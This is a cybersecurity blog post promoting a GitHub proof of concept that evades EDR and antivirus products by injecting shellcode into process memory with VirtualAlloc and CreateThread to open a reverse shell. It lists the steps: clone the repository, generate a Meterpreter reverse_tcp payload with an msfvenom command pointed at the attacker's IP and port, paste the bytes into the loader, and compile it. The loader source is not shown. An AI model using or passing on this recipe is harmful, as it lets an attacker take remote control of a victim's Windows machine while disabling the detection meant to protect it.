Cyber security

EDR-Antivirus-Bypass-To-Gain-Shell-Access

This repository contains a proof-of-concept (PoC) for bypassing EDR and antivirus solutions using a memory injection technique.

The code executes shellcode that spawns a reverse shell, successfully evading detection by various security mechanisms.

Description

This project demonstrates how to bypass EDR and antivirus protection using Windows API functions such as VirtualAlloc, CreateThread, and WaitForSingleObject.

The payload is injected directly into the process memory without being detected by security tools, establishing a connection to a remote system for a reverse shell.

Features

  • Bypasses standard EDR and antivirus solutions
  • Executes shellcode in memory to create a reverse shell
  • Utilizes VirtualAlloc and CreateThread to inject the payload directly into process memory

Requirements

  • Windows Operating System (Tested on Windows 11 Pro)
  • Kali Linux (For reverse shell listener)
  • Visual Studio or any C# compiler

Steps To Compile And Run

1. Clone The Repository

https://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access.git
cd EDR-Antivirus-Bypass-Shell-Access

2. Modify Shellcode

Before compiling, ensure that you modify the shellcode to point to your own IP address and port for the reverse shell. You can generate shellcode using msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<YOUR_PORT> -f csharp

Replace the byte[] buf section in Program.cs with the shellcode you just generated.

3. Compile The Code

Open the project in Visual Studio, or use the following command to compile the code using the .NET SDK:

csc loader.cs

**Alternatively, you can compile in Release mode for better optimization:

csc -optimize loader.cs

For more information click here.

Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Recent Posts

How Does a Firewall Work Step by Step

How Does a Firewall Work Step by Step? What Is a Firewall and How Does…

5 hours ago

Fake VPN Download Trap Can Steal Your Work Login in Minutes

People trying to securely connect to work are being tricked into doing the exact opposite.…

1 day ago

This Android Bug Can Crack Your Lock Screen in 60 Seconds

A newly disclosed Android vulnerability is making noise for a good reason. Researchers showed that…

5 days ago

How to Fix MyISAM Table Corruption in MySQL?

In MySQL Server 5.5 and earlier versions, the MyISAM was the default storage engine. So,…

6 days ago

Microsoft Authenticator Flaw Could Leak Login Codes

A newly disclosed vulnerability in Microsoft Authenticator could expose one time sign in codes or…

7 days ago

Modrinth – A Comprehensive Overview of Tools and Functions

Modrinth is a modern platform that’s rapidly changing the landscape of Minecraft modding, providing an…

1 week ago